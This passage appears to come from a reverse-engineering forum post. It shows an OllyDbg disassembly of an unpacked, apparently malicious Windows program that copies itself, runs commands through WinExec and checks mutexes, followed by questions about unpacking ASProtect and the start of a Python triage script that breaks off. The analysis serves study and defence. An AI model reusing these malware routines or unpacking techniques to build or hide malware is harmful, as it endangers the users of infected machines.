0040FC19 |. 8B85 E4FEFFFF mov eax, dword ptr ss:[ebp-11C]
0040FC1F |. E8 7442FFFF call 00403E98
0040FC24 |. 50 push eax
0040FC25 |. A1 34154100 mov eax, dword ptr ds:[411534]
0040FC2A |. 8B00 mov eax, dword ptr ds:[eax]
0040FC2C |. E8 6742FFFF call 00403E98
0040FC31 |. 50 push eax ; |ExistingFileName
0040FC32 |. E8 4D4AFFFF call <jmp.&kernel32.CopyFileA> ; \CopyFileA
0040FC37 |. 6A 01 push 1
0040FC39 |. 8D85 D8FEFFFF lea eax, dword ptr ss:[ebp-128]
0040FC3F |. E8 DC7DFFFF call 00407A20
0040FC44 |. FFB5 D8FEFFFF push dword ptr ss:[ebp-128]
0040FC4A |. A1 5C144100 mov eax, dword ptr ds:[41145C]
0040FC4F |. FF30 push dword ptr ds:[eax]
0040FC51 |. FF37 push dword ptr ds:[edi]
0040FC53 |. 8D85 DCFEFFFF lea eax, dword ptr ss:[ebp-124]
0040FC59 |. BA 03000000 mov edx, 3
0040FC5E |. E8 F540FFFF call 00403D58
0040FC63 |. 8B85 DCFEFFFF mov eax, dword ptr ss:[ebp-124]
0040FC69 |. E8 2A42FFFF call 00403E98
0040FC6E |. 50 push eax ; |CmdLine
0040FC6F |. E8 304BFFFF call <jmp.&kernel32.WinExec> ; \WinExec
0040FC74 |. 6A 01 push 1
0040FC76 |. 8D85 D0FEFFFF lea eax, dword ptr ss:[ebp-130]
0040FC7C |. E8 4F7EFFFF call 00407AD0
0040FC81 |. FFB5 D0FEFFFF push dword ptr ss:[ebp-130]
0040FC87 |. A1 3C154100 mov eax, dword ptr ds:[41153C]
0040FC8C |. FF30 push dword ptr ds:[eax]
0040FC8E |. FF37 push dword ptr ds:[edi]
0040FC90 |. 8D85 D4FEFFFF lea eax, dword ptr ss:[ebp-12C]
0040FC96 |. BA 03000000 mov edx, 3
0040FC9B |. E8 B840FFFF call 00403D58
0040FCA0 |. 8B85 D4FEFFFF mov eax, dword ptr ss:[ebp-12C]
0040FCA6 |. E8 ED41FFFF call 00403E98
0040FCAB |. 50 push eax ; |CmdLine
0040FCAC |. E8 F34AFFFF call <jmp.&kernel32.WinExec> ; \WinExec
0040FCB1 |. BE 17000000 mov esi, 17
0040FCB6 |. 8B1D 84144100 mov ebx, dword ptr ds:[411484] ; 1.004110CC
0040FCBC |> A1 58154100 /mov eax, dword ptr ds:[411558]
0040FCC1 |. 8B13 |mov edx, dword ptr ds:[ebx]
0040FCC3 |. E8 A03EFFFF |call 00403B68
0040FCC8 |. 8D95 CCFEFFFF |lea edx, dword ptr ss:[ebp-134]
0040FCCE |. A1 34154100 |mov eax, dword ptr ds:[411534]
0040FCD3 |. 8B00 |mov eax, dword ptr ds:[eax]
0040FCD5 |. E8 2667FFFF |call 00406400
0040FCDA |. 8B85 CCFEFFFF |mov eax, dword ptr ss:[ebp-134]
0040FCE0 |. 50 |push eax
0040FCE1 |. A1 58154100 |mov eax, dword ptr ds:[411558]
0040FCE6 |. FF30 |push dword ptr ds:[eax]
0040FCE8 |. A1 50154100 |mov eax, dword ptr ds:[411550]
0040FCED |. FF30 |push dword ptr ds:[eax]
0040FCEF |. FF37 |push dword ptr ds:[edi]
0040FCF1 |. 8D85 C4FEFFFF |lea eax, dword ptr ss:[ebp-13C]
0040FCF7 |. BA 03000000 |mov edx, 3
0040FCFC |. E8 5740FFFF |call 00403D58
0040FD01 |. 8B85 C4FEFFFF |mov eax, dword ptr ss:[ebp-13C]
0040FD07 |. 8D95 C8FEFFFF |lea edx, dword ptr ss:[ebp-138]
0040FD0D |. E8 EE66FFFF |call 00406400
0040FD12 |. 8B95 C8FEFFFF |mov edx, dword ptr ss:[ebp-138]
0040FD18 |. 58 |pop eax
0040FD19 |. E8 C640FFFF |call 00403DE4
0040FD1E |. 74 05 |je short 0040FD25
0040FD20 |. E8 A761FFFF |call 00405ECC
0040FD25 |> 83C3 04 |add ebx, 4
0040FD28 |. 4E |dec esi
0040FD29 |.^ 75 91 \jnz short 0040FCBC
0040FD2B |. E9 C0050000 jmp 004102F0
0040FD30 |> A1 34154100 mov eax, dword ptr ds:[411534]
0040FD35 |. BA 04010000 mov edx, 104
0040FD3A |. E8 8142FFFF call 00403FC0
0040FD3F |. 68 04010000 push 104
0040FD44 |. A1 34154100 mov eax, dword ptr ds:[411534]
0040FD49 |. 8B00 mov eax, dword ptr ds:[eax]
0040FD4B |. E8 4841FFFF call 00403E98
0040FD50 |. 50 push eax ; |PathBuffer
0040FD51 |. A1 50264100 mov eax, dword ptr ds:[412650] ; |
0040FD56 |. 50 push eax ; |hModule => NULL
0040FD57 |. E8 C049FFFF call <jmp.&kernel32.GetModuleFileName>; \GetModuleFileNameA
0040FD5C |. 8BD0 mov edx, eax
0040FD5E |. A1 34154100 mov eax, dword ptr ds:[411534]
0040FD63 |. E8 5842FFFF call 00403FC0
0040FD68 |. E8 DB85FFFF call 00408348
0040FD6D |. 8D95 C0FEFFFF lea edx, dword ptr ss:[ebp-140]
0040FD73 |. A1 34154100 mov eax, dword ptr ds:[411534]
0040FD78 |. 8B00 mov eax, dword ptr ds:[eax]
0040FD7A |. E8 8166FFFF call 00406400
0040FD7F |. 8B85 C0FEFFFF mov eax, dword ptr ss:[ebp-140]
0040FD85 |. 50 push eax
0040FD86 |. 8D85 B4FEFFFF lea eax, dword ptr ss:[ebp-14C]
0040FD8C |. E8 8F7CFFFF call 00407A20
0040FD91 |. FFB5 B4FEFFFF push dword ptr ss:[ebp-14C]
0040FD97 |. A1 5C144100 mov eax, dword ptr ds:[41145C]
0040FD9C |. FF30 push dword ptr ds:[eax]
0040FD9E |. FF37 push dword ptr ds:[edi]
0040FDA0 |. 8D85 B8FEFFFF lea eax, dword ptr ss:[ebp-148]
0040FDA6 |. BA 03000000 mov edx, 3
0040FDAB |. E8 A83FFFFF call 00403D58
0040FDB0 |. 8B85 B8FEFFFF mov eax, dword ptr ss:[ebp-148]
0040FDB6 |. 8D95 BCFEFFFF lea edx, dword ptr ss:[ebp-144]
0040FDBC |. E8 3F66FFFF call 00406400
0040FDC1 |. 8B95 BCFEFFFF mov edx, dword ptr ss:[ebp-144]
0040FDC7 |. 58 pop eax
0040FDC8 |. E8 1740FFFF call 00403DE4
0040FDCD |. 0F85 7E020000 jnz 00410051
0040FDD3 |. 6A 00 push 0 ; /Title = NULL
0040FDD5 |. 68 88044100 push 00410488 ; |Class = "Shell_TrayWnd"
0040FDDA |. E8 E549FFFF call <jmp.&user32.FindWindowA> ; \FindWindowA
0040FDDF |. 85C0 test eax, eax
0040FDE1 |. 0F84 09050000 je 004102F0
0040FDE7 |. 8D95 B0FEFFFF lea edx, dword ptr ss:[ebp-150]
0040FDED |. A1 60144100 mov eax, dword ptr ds:[411460]
0040FDF2 |. 8B00 mov eax, dword ptr ds:[eax]
0040FDF4 |. E8 A368FFFF call 0040669C
0040FDF9 |. 8D85 B0FEFFFF lea eax, dword ptr ss:[ebp-150]
0040FDFF |. 50 push eax
0040FE00 |. 8D85 A8FEFFFF lea eax, dword ptr ss:[ebp-158]
0040FE06 |. E8 BD62FFFF call 004060C8
0040FE0B |. 8B85 A8FEFFFF mov eax, dword ptr ss:[ebp-158]
0040FE11 |. 8D95 ACFEFFFF lea edx, dword ptr ss:[ebp-154]
0040FE17 |. E8 707DFFFF call 00407B8C
0040FE1C |. 8B95 ACFEFFFF mov edx, dword ptr ss:[ebp-154]
0040FE22 |. 58 pop eax
0040FE23 |. E8 783EFFFF call 00403CA0
0040FE28 |. 8B85 B0FEFFFF mov eax, dword ptr ss:[ebp-150]
0040FE2E |. E8 6540FFFF call 00403E98
0040FE33 |. 50 push eax ; /MutexName
0040FE34 |. 6A 00 push 0 ; |Inheritable = FALSE
0040FE36 |. 68 01001F00 push 1F0001 ; |Access = 1F0001
0040FE3B |. E8 2449FFFF call <jmp.&kernel32.OpenMutexA> ; \OpenMutexA
0040FE40 |. 85C0 test eax, eax
0040FE42 |. 0F85 A8040000 jnz 004102F0
0040FE48 |. 8D95 A4FEFFFF lea edx, dword ptr ss:[ebp-15C]
0040FE4E |. A1 60144100 mov eax, dword ptr ds:[411460]
0040FE53 |. 8B00 mov eax, dword ptr ds:[eax]
0040FE55 |. E8 4268FFFF call 0040669C
0040FE5A |. 8D85 A4FEFFFF lea eax, dword ptr ss:[ebp-15C]
0040FE60 |. 50 push eax
0040FE61 |. 8D85 9CFEFFFF lea eax, dword ptr ss:[ebp-164]
0040FE67 |. E8 5C62FFFF call 004060C8
0040FE6C |. 8B85 9CFEFFFF mov eax, dword ptr ss:[ebp-164]
0040FE72 |. 8D95 A0FEFFFF lea edx, dword ptr ss:[ebp-160]
0040FE78 |. E8 0F7DFFFF call 00407B8C
0040FE7D |. 8B95 A0FEFFFF mov edx, dword ptr ss:[ebp-160]
0040FE83 |. 58 pop eax
0040FE84 |. E8 173EFFFF call 00403CA0
0040FE89 |. 8B85 A4FEFFFF mov eax, dword ptr ss:[ebp-15C]
0040FE8F |. E8 0440FFFF call 00403E98
0040FE94 |. 50 push eax ; /Arg3
0040FE95 |. 6A FF push -1 ; |Arg2 = FFFFFFFF
0040FE97 |. 6A 00 push 0 ; |Arg1 = 00000000
0040FE99 |. E8 FE47FFFF call 0040469C ; \1.0040469C
0040FE9E |. 8B15 9C144100 mov edx, dword ptr ds:[41149C] ; 1.0041278C
0040FEA4 |. 8902 mov dword ptr ds:[edx], eax
0040FEA6 |. 8D95 98FEFFFF lea edx, dword ptr ss:[ebp-168]
0040FEAC |. A1 24154100 mov eax, dword ptr ds:[411524]
0040FEB1 |. 8B00 mov eax, dword ptr ds:[eax]
0040FEB3 |. E8 E467FFFF call 0040669C
0040FEB8 |. 8B85 98FEFFFF mov eax, dword ptr ss:[ebp-168]
0040FEBE |. E8 D53FFFFF call 00403E98
0040FEC3 |. 50 push eax ; /Arg3
0040FEC4 |. 6A FF push -1 ; |Arg2 = FFFFFFFF
0040FEC6 |. 6A 00 push 0 ; |Arg1 = 00000000
0040FEC8 |. E8 CF47FFFF call 0040469C ; \1.0040469C
0040FECD |. 8B15 AC144100 mov edx, dword ptr ds:[4114AC] ; 1.00412790
0040FED3 |. 8902 mov dword ptr ds:[edx], eax
0040FED5 |. A1 34154100 mov eax, dword ptr ds:[411534]
0040FEDA |. BA 04010000 mov edx, 104
0040FEDF |. E8 DC40FFFF call 00403FC0
0040FEE4 |. 68 04010000 push 104
0040FEE9 |. A1 34154100 mov eax, dword ptr ds:[411534]
0040FEEE |. 8B00 mov eax, dword ptr ds:[eax]
0040FEF0 |. E8 A33FFFFF call 00403E98
0040FEF5 |. 50 push eax ; |PathBuffer
0040FEF6 |. A1 50264100 mov eax, dword ptr ds:[412650] ; |
0040FEFB |. 50 push eax ; |hModule => NULL
0040FEFC |. E8 1B48FFFF call <jmp.&kernel32.GetModuleFileName>; \GetModuleFileNameA
0040FF01 |. 8BD0 mov edx, eax
0040FF03 |. A1 34154100 mov eax, dword ptr ds:[411534]
0040FF08 |. E8 B340FFFF call 00403FC0
0040FF0D |. E8 3684FFFF call 00408348
0040FF12 |. E8 9D6AFFFF call 004069B4
0040FF17 |. A1 70154100 mov eax, dword ptr ds:[411570]
0040FF1C |. 50 push eax ; /pThreadId => 1.004126D8
0040FF1D |. 6A 00 push 0 ; |CreationFlags = 0
0040FF1F |. 6A 00 push 0 ; |pThreadParm = NULL
0040FF21 |. 68 C8C74000 push 0040C7C8 ; |ThreadFunction = 1.0040C7C8
0040FF26 |. 6A 00 push 0 ; |StackSize = 0
0040FF28 |. 6A 00 push 0 ; |pSecurity = NULL
0040FF2A |. E8 8D47FFFF call <jmp.&kernel32.CreateThread> ; \CreateThread
0040FF2F |. A1 78154100 mov eax, dword ptr ds:[411578]
0040FF34 |. 50 push eax ; /pThreadId => 1.004126DC
0040FF35 |. 6A 00 push 0 ; |CreationFlags = 0
0040FF37 |. 6A 00 push 0 ; |pThreadParm = NULL
0040FF39 |. 68 4CA34000 push 0040A34C ; |ThreadFunction = 1.0040A34C
0040FF3E |. 6A 00 push 0 ; |StackSize = 0
0040FF40 |. 6A 00 push 0 ; |pSecurity = NULL
0040FF42 |. E8 7547FFFF call <jmp.&kernel32.CreateThread> ; \CreateThread
0040FF47 |. 68 3CEA4000 push 0040EA3C ; /Timerproc = 1.0040EA3C
0040FF4C |. 68 14050000 push 514 ; |Timeout = 1300. ms
0040FF51 |. 6A 00 push 0 ; |TimerID = 0
0040FF53 |. 6A 00 push 0 ; |hWnd = NULL
0040FF55 |. E8 C248FFFF call <jmp.&user32.SetTimer> ; \SetTimer
0040FF5A |. 8B15 74154100 mov edx, dword ptr ds:[411574] ; 1.00413098
0040FF60 |. 8902 mov dword ptr ds:[edx], eax
0040FF62 |. 68 F0EE4000 push 0040EEF0 ; /Timerproc = 1.0040EEF0
0040FF67 |. 68 88130000 push 1388 ; |Timeout = 5000. ms
0040FF6C |. 6A 00 push 0 ; |TimerID = 0
0040FF6E |. 6A 00 push 0 ; |hWnd = NULL
0040FF70 |. E8 A748FFFF call <jmp.&user32.SetTimer> ; \SetTimer
0040FF75 |. 8B15 F8144100 mov edx, dword ptr ds:[4114F8] ; 1.004130A0
0040FF7B |. 8902 mov dword ptr ds:[edx], eax
0040FF7D |. 68 08EF4000 push 0040EF08 ; /Timerproc = 1.0040EF08
0040FF82 |. 68 98080000 push 898 ; |Timeout = 2200. ms
0040FF87 |. 6A 00 push 0 ; |TimerID = 0
0040FF89 |. 6A 00 push 0 ; |hWnd = NULL
0040FF8B |. E8 8C48FFFF call <jmp.&user32.SetTimer> ; \SetTimer
0040FF90 |. 8B15 C4144100 mov edx, dword ptr ds:[4114C4] ; 1.004130A4
0040FF96 |. 8902 mov dword ptr ds:[edx], eax
0040FF98 |. A1 48144100 mov eax, dword ptr ds:[411448]
0040FF9D |. 8B00 mov eax, dword ptr ds:[eax]
0040FF9F |. BA A0044100 mov edx, 004104A0 ; ASCII "no"
0040FFA4 |. E8 3B3EFFFF call 00403DE4
0040FFA9 |. 74 3B je short 0040FFE6
0040FFAB |. 68 A8C44000 push 0040C4A8
0040FFB0 |. A1 48144100 mov eax, dword ptr ds:[411448]
0040FFB5 |. 8B00 mov eax, dword ptr ds:[eax]
0040FFB7 |. E8 7864FFFF call 00406434
0040FFBC |. 50 push eax ; |Timeout
0040FFBD |. 6A 00 push 0 ; |TimerID = 0
0040FFBF |. 6A 00 push 0 ; |hWnd = NULL
0040FFC1 |. E8 5648FFFF call <jmp.&user32.SetTimer> ; \SetTimer
0040FFC6 |. 8B15 84154100 mov edx, dword ptr ds:[411584] ; 1.0041309C
0040FFCC |. 8902 mov dword ptr ds:[edx], eax
0040FFCE |. EB 16 jmp short 0040FFE6
0040FFD0 |> A1 6C154100 /mov eax, dword ptr ds:[41156C]
0040FFD5 |. 50 |push eax ; /pMsg => WM_NULL
0040FFD6 |. E8 4948FFFF |call <jmp.&user32.TranslateMessage> ; \TranslateMessage
0040FFDB |. A1 6C154100 |mov eax, dword ptr ds:[41156C]
0040FFE0 |. 50 |push eax ; /pMsg => WM_NULL
0040FFE1 |. E8 D647FFFF |call <jmp.&user32.DispatchMessageA> ; \DispatchMessageA
0040FFE6 |> 6A 00 push 0 ; /MsgFilterMax = 0
0040FFE8 |. 6A 00 |push 0 ; |MsgFilterMin = 0
0040FFEA |. 6A 00 |push 0 ; |hWnd = NULL
0040FFEC |. A1 6C154100 |mov eax, dword ptr ds:[41156C] ; |
0040FFF1 |. 50 |push eax ; |pMsg => 1.004126B8
0040FFF2 |. E8 E547FFFF |call <jmp.&user32.GetMessageA> ; \GetMessageA
0040FFF7 |. 85C0 |test eax, eax
0040FFF9 |.^ 75 D5 \jnz short 0040FFD0
0040FFFB |. A1 74154100 mov eax, dword ptr ds:[411574]
00410000 |. 8B00 mov eax, dword ptr ds:[eax]
00410002 |. 50 push eax ; /TimerID
00410003 |. 6A 00 push 0 ; |hWnd = NULL
00410005 |. E8 FA47FFFF call <jmp.&user32.KillTimer> ; \KillTimer
0041000A |. A1 84154100 mov eax, dword ptr ds:[411584]
0041000F |. 8B00 mov eax, dword ptr ds:[eax]
00410011 |. 50 push eax ; /TimerID
00410012 |. 6A 00 push 0 ; |hWnd = NULL
00410014 |. E8 EB47FFFF call <jmp.&user32.KillTimer> ; \KillTimer
00410019 |. A1 F8144100 mov eax, dword ptr ds:[4114F8]
0041001E |. 8B00 mov eax, dword ptr ds:[eax]
00410020 |. 50 push eax ; /TimerID
00410021 |. 6A 00 push 0 ; |hWnd = NULL
00410023 |. E8 DC47FFFF call <jmp.&user32.KillTimer> ; \KillTimer
00410028 |. A1 C4144100 mov eax, dword ptr ds:[4114C4]
0041002D |. 8B00 mov eax, dword ptr ds:[eax]
0041002F |. 50 push eax ; /TimerID
00410030 |. 6A 00 push 0 ; |hWnd = NULL
00410032 |. E8 CD47FFFF call <jmp.&user32.KillTimer> ; \KillTimer
00410037 |. A1 9C144100 mov eax, dword ptr ds:[41149C]
0041003C |. 8B00 mov eax, dword ptr ds:[eax]
0041003E |. 50 push eax ; /hMutex
0041003F |. E8 3047FFFF call <jmp.&kernel32.ReleaseMutex> ; \ReleaseMutex
00410044 |. A1 AC144100 mov eax, dword ptr ds:[4114AC]
00410049 |. 8B00 mov eax, dword ptr ds:[eax]
0041004B |. 50 push eax ; /hMutex
0041004C |. E8 2347FFFF call <jmp.&kernel32.ReleaseMutex> ; \ReleaseMutex
00410051 |> 8D95 94FEFFFF lea edx, dword ptr ss:[ebp-16C]
00410057 |. A1 34154100 mov eax, dword ptr ds:[411534]
0041005C |. 8B00 mov eax, dword ptr ds:[eax]
0041005E |. E8 9D63FFFF call 00406400
00410063 |. 8B85 94FEFFFF mov eax, dword ptr ss:[ebp-16C]
00410069 |. 50 push eax
0041006A |. 8D85 88FEFFFF lea eax, dword ptr ss:[ebp-178]
00410070 |. E8 5B7AFFFF call 00407AD0
00410075 |. FFB5 88FEFFFF push dword ptr ss:[ebp-178]
0041007B |. A1 3C154100 mov eax, dword ptr ds:[41153C]
00410080 |. FF30 push dword ptr ds:[eax]
00410082 |. FF37 push dword ptr ds:[edi]
00410084 |. 8D85 8CFEFFFF lea eax, dword ptr ss:[ebp-174]
0041008A |. BA 03000000 mov edx, 3
0041008F |. E8 C43CFFFF call 00403D58
00410094 |. 8B85 8CFEFFFF mov eax, dword ptr ss:[ebp-174]
0041009A |. 8D95 90FEFFFF lea edx, dword ptr ss:[ebp-170]
004100A0 |. E8 5B63FFFF call 00406400
004100A5 |. 8B95 90FEFFFF mov edx, dword ptr ss:[ebp-170]
004100AB |. 58 pop eax
004100AC |. E8 333DFFFF call 00403DE4
004100B1 |. 0F85 39020000 jnz 004102F0
004100B7 |. 6A 00 push 0 ; /Title = NULL
004100B9 |. 68 88044100 push 00410488 ; |Class = "Shell_TrayWnd"
004100BE |. E8 0147FFFF call <jmp.&user32.FindWindowA> ; \FindWindowA
004100C3 |. 85C0 test eax, eax
004100C5 |. 0F84 25020000 je 004102F0
004100CB |. 8D85 80FEFFFF lea eax, dword ptr ss:[ebp-180]
004100D1 |. E8 F25FFFFF call 004060C8
004100D6 |. 8B85 80FEFFFF mov eax, dword ptr ss:[ebp-180]
004100DC |. 8D95 84FEFFFF lea edx, dword ptr ss:[ebp-17C]
004100E2 |. E8 A57AFFFF call 00407B8C
004100E7 |. 8D85 84FEFFFF lea eax, dword ptr ss:[ebp-17C]
004100ED |. 50 push eax
004100EE |. 8D95 7CFEFFFF lea edx, dword ptr ss:[ebp-184]
004100F4 |. A1 64144100 mov eax, dword ptr ds:[411464]
004100F9 |. 8B00 mov eax, dword ptr ds:[eax]
004100FB |. E8 9C65FFFF call 0040669C
00410100 |. 8B95 7CFEFFFF mov edx, dword ptr ss:[ebp-184]
00410106 |. 58 pop eax
00410107 |. E8 943BFFFF call 00403CA0
0041010C |. 8B85 84FEFFFF mov eax, dword ptr ss:[ebp-17C]
00410112 |. E8 813DFFFF call 00403E98
00410117 |. 50 push eax ; /MutexName
00410118 |. 6A 00 push 0 ; |Inheritable = FALSE
0041011A |. 68 01001F00 push 1F0001 ; |Access = 1F0001
0041011F |. E8 4046FFFF call <jmp.&kernel32.OpenMutexA> ; \OpenMutexA
00410124 |. 85C0 test eax, eax
00410126 |. 0F85 C4010000 jnz 004102F0
0041012C |. 8D85 74FEFFFF lea eax, dword ptr ss:[ebp-18C]
00410132 |. E8 915FFFFF call 004060C8
00410137 |. 8B85 74FEFFFF mov eax, dword ptr ss:[ebp-18C]
0041013D |. 8D95 78FEFFFF lea edx, dword ptr ss:[ebp-188]
00410143 |. E8 447AFFFF call 00407B8C
00410148 |. 8D85 78FEFFFF lea eax, dword ptr ss:[ebp-188]
0041014E |. 50 push eax
0041014F |. 8D95 70FEFFFF lea edx, dword ptr ss:[ebp-190]
00410155 |. A1 64144100 mov eax, dword ptr ds:[411464]
0041015A |. 8B00 mov eax, dword ptr ds:[eax]
0041015C |. E8 3B65FFFF call 0040669C
00410161 |. 8B95 70FEFFFF mov edx, dword ptr ss:[ebp-190]
00410167 |. 58 pop eax
00410168 |. E8 333BFFFF call 00403CA0
0041016D |. 8B85 78FEFFFF mov eax, dword ptr ss:[ebp-188]
00410173 |. E8 203DFFFF call 00403E98
00410178 |. 50 push eax ; /Arg3
00410179 |. 6A FF push -1 ; |Arg2 = FFFFFFFF
0041017B |. 6A 00 push 0 ; |Arg1 = 00000000
0041017D |. E8 1A45FFFF call 0040469C ; \1.0040469C
00410182 |. 8B15 88154100 mov edx, dword ptr ds:[411588] ; 1.00412794
00410188 |. 8902 mov dword ptr ds:[edx], eax
0041018A |. 8D95 6CFEFFFF lea edx, dword ptr ss:[ebp-194]
00410190 |. A1 40154100 mov eax, dword ptr ds:[411540]
00410195 |. 8B00 mov eax, dword ptr ds:[eax]
00410197 |. E8 0065FFFF call 0040669C
0041019C |. 8B85 6CFEFFFF mov eax, dword ptr ss:[ebp-194]
004101A2 |. E8 F13CFFFF call 00403E98
004101A7 |. 50 push eax ; /Arg3
004101A8 |. 6A FF push -1 ; |Arg2 = FFFFFFFF
004101AA |. 6A 00 push 0 ; |Arg1 = 00000000
004101AC |. E8 EB44FFFF call 0040469C ; \1.0040469C
004101B1 |. 8B15 20154100 mov edx, dword ptr ds:[411520] ; 1.00412798
004101B7 |. 8902 mov dword ptr ds:[edx], eax
004101B9 |. A1 34154100 mov eax, dword ptr ds:[411534]
004101BE |. BA 04010000 mov edx, 104
004101C3 |. E8 F83DFFFF call 00403FC0
004101C8 |. 68 04010000 push 104
004101CD |. A1 34154100 mov eax, dword ptr ds:[411534]
004101D2 |. 8B00 mov eax, dword ptr ds:[eax]
004101D4 |. E8 BF3CFFFF call 00403E98
004101D9 |. 50 push eax ; |PathBuffer
004101DA |. A1 50264100 mov eax, dword ptr ds:[412650] ; |
004101DF |. 50 push eax ; |hModule => NULL
004101E0 |. E8 3745FFFF call <jmp.&kernel32.GetModuleFileName>; \GetModuleFileNameA
004101E5 |. 8BD0 mov edx, eax
004101E7 |. A1 34154100 mov eax, dword ptr ds:[411534]
004101EC |. E8 CF3DFFFF call 00403FC0
004101F1 |. E8 5281FFFF call 00408348
004101F6 |. E8 B967FFFF call 004069B4
004101FB |. A1 70154100 mov eax, dword ptr ds:[411570]
00410200 |. 50 push eax ; /pThreadId => 1.004126D8
00410201 |. 6A 00 push 0 ; |CreationFlags = 0
00410203 |. 6A 00 push 0 ; |pThreadParm = NULL
00410205 |. 68 E0E64000 push 0040E6E0 ; |ThreadFunction = 1.0040E6E0
0041020A |. 6A 00 push 0 ; |StackSize = 0
0041020C |. 6A 00 push 0 ; |pSecurity = NULL
0041020E |. E8 A944FFFF call <jmp.&kernel32.CreateThread> ; \CreateThread
00410213 |. A1 78154100 mov eax, dword ptr ds:[411578]
00410218 |. 50 push eax ; /pThreadId => 1.004126DC
00410219 |. 6A 00 push 0 ; |CreationFlags = 0
0041021B |. 6A 00 push 0 ; |pThreadParm = NULL
0041021D |. 68 D8BD4000 push 0040BDD8 ; |ThreadFunction = 1.0040BDD8
00410222 |. 6A 00 push 0 ; |StackSize = 0
00410224 |. 6A 00 push 0 ; |pSecurity = NULL
00410226 |. E8 9144FFFF call <jmp.&kernel32.CreateThread> ; \CreateThread
0041022B |. 68 A0EC4000 push 0040ECA0 ; /Timerproc = 1.0040ECA0
00410230 |. 68 14050000 push 514 ; |Timeout = 1300. ms
00410235 |. 6A 00 push 0 ; |TimerID = 0
00410237 |. 6A 00 push 0 ; |hWnd = NULL
00410239 |. E8 DE45FFFF call <jmp.&user32.SetTimer> ; \SetTimer
0041023E |. 8B15 74154100 mov edx, dword ptr ds:[411574] ; 1.00413098
00410244 |. 8902 mov dword ptr ds:[edx], eax
00410246 |. 68 E4EE4000 push 0040EEE4 ; /Timerproc = 1.0040EEE4
0041024B |. 68 70170000 push 1770 ; |Timeout = 6000. ms
00410250 |. 6A 00 push 0 ; |TimerID = 0
00410252 |. 6A 00 push 0 ; |hWnd = NULL
00410254 |. E8 C345FFFF call <jmp.&user32.SetTimer> ; \SetTimer
00410259 |. 8B15 84154100 mov edx, dword ptr ds:[411584] ; 1.0041309C
0041025F |. 8902 mov dword ptr ds:[edx], eax
00410261 |. 68 0CF24000 push 0040F20C ; /Timerproc = 1.0040F20C
00410266 |. 68 E8030000 push 3E8 ; |Timeout = 1000. ms
0041026B |. 6A 00 push 0 ; |TimerID = 0
0041026D |. 6A 00 push 0 ; |hWnd = NULL
0041026F |. E8 A845FFFF call <jmp.&user32.SetTimer> ; \SetTimer
00410274 |. 8B15 F8144100 mov edx, dword ptr ds:[4114F8] ; 1.004130A0
0041027A |. 8902 mov dword ptr ds:[edx], eax
0041027C |. EB 16 jmp short 00410294
0041027E |> A1 6C154100 /mov eax, dword ptr ds:[41156C]
00410283 |. 50 |push eax ; /pMsg => WM_NULL
00410284 |. E8 9B45FFFF |call <jmp.&user32.TranslateMessage> ; \TranslateMessage
00410289 |. A1 6C154100 |mov eax, dword ptr ds:[41156C]
0041028E |. 50 |push eax ; /pMsg => WM_NULL
0041028F |. E8 2845FFFF |call <jmp.&user32.DispatchMessageA> ; \DispatchMessageA
00410294 |> 6A 00 push 0 ; /MsgFilterMax = 0
00410296 |. 6A 00 |push 0 ; |MsgFilterMin = 0
00410298 |. 6A 00 |push 0 ; |hWnd = NULL
0041029A |. A1 6C154100 |mov eax, dword ptr ds:[41156C] ; |
0041029F |. 50 |push eax ; |pMsg => 1.004126B8
004102A0 |. E8 3745FFFF |call <jmp.&user32.GetMessageA> ; \GetMessageA
004102A5 |. 85C0 |test eax, eax
004102A7 |.^ 75 D5 \jnz short 0041027E
004102A9 |. A1 74154100 mov eax, dword ptr ds:[411574]
004102AE |. 8B00 mov eax, dword ptr ds:[eax]
004102B0 |. 50 push eax ; /TimerID
004102B1 |. 6A 00 push 0 ; |hWnd = NULL
004102B3 |. E8 4C45FFFF call <jmp.&user32.KillTimer> ; \KillTimer
004102B8 |. A1 84154100 mov eax, dword ptr ds:[411584]
004102BD |. 8B00 mov eax, dword ptr ds:[eax]
004102BF |. 50 push eax ; /TimerID
004102C0 |. 6A 00 push 0 ; |hWnd = NULL
004102C2 |. E8 3D45FFFF call <jmp.&user32.KillTimer> ; \KillTimer
004102C7 |. A1 F8144100 mov eax, dword ptr ds:[4114F8]
004102CC |. 8B00 mov eax, dword ptr ds:[eax]
004102CE |. 50 push eax ; /TimerID
004102CF |. 6A 00 push 0 ; |hWnd = NULL
004102D1 |. E8 2E45FFFF call <jmp.&user32.KillTimer> ; \KillTimer
004102D6 |. A1 88154100 mov eax, dword ptr ds:[411588]
004102DB |. 8B00 mov eax, dword ptr ds:[eax]
004102DD |. 50 push eax ; /hMutex
004102DE |. E8 9144FFFF call <jmp.&kernel32.ReleaseMutex> ; \ReleaseMutex
004102E3 |. A1 20154100 mov eax, dword ptr ds:[411520]
004102E8 |. 8B00 mov eax, dword ptr ds:[eax]
004102EA |. 50 push eax ; /hMutex
004102EB |. E8 8444FFFF call <jmp.&kernel32.ReleaseMutex> ; \ReleaseMutex
004102F0 |> 33C0 xor eax, eax
004102F2 |. 5A pop edx
004102F3 |. 59 pop ecx
004102F4 |. 59 pop ecx
004102F5 |. 64:8910 mov dword ptr fs:[eax], edx
004102F8 |. 68 25034100 push 00410325
004102FD |> 8D85 6CFEFFFF lea eax, dword ptr ss:[ebp-194]
00410303 |. BA 39000000 mov edx, 39
00410308 |. E8 2B38FFFF call 00403B38
0041030D |. 8D85 78FFFFFF lea eax, dword ptr ss:[ebp-88]
00410313 |. BA 1E000000 mov edx, 1E
00410318 |. E8 1B38FFFF call 00403B38
0041031D \. C3 retn
Sorry for being so long-winded; I hope the experts don't find it a bother.
I have a few questions here for any experts passing by:
1. After unpacking ASProtect the dump normally has to be repaired, either by hand or with a script, but this one doesn't seem to need it. Is that because there is another layer of packer inside that has already encrypted the IAT?
2. In ASProtect there is always some code that jumps to an instruction you cannot see in OD, but as soon as you jump there the instruction appears;
yet the moment you scroll the window it changes again. Why is that?
The above are problems I ran into while reading other people's featured posts and tracing along; I don't know whether these questions are very basic, my level is just too low.
Please excuse my ignorance, experts.
It is already two in the morning; I'll analyze its workflow slowly later, time to rest first.
I've also taken up the precious time of the experts who read this newbie's post.
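As an added example (not part of the original post), here is a small Python triage script that parses OllyDbg listing lines like the ones above and summarises the Win32 APIs and string constants the unpacked code references, which is what a defender reads off a dump like this one (Run-key persistence, self-copy via CopyFileA after GetModuleFileNameA, a named-mutex check). The sample lines are copied from the listing; the behaviour labels and the HKEY constant table are my own.

```python
"""Triage helper for an OllyDbg disassembly listing (constructed example, not from the post).

Parses lines of the form
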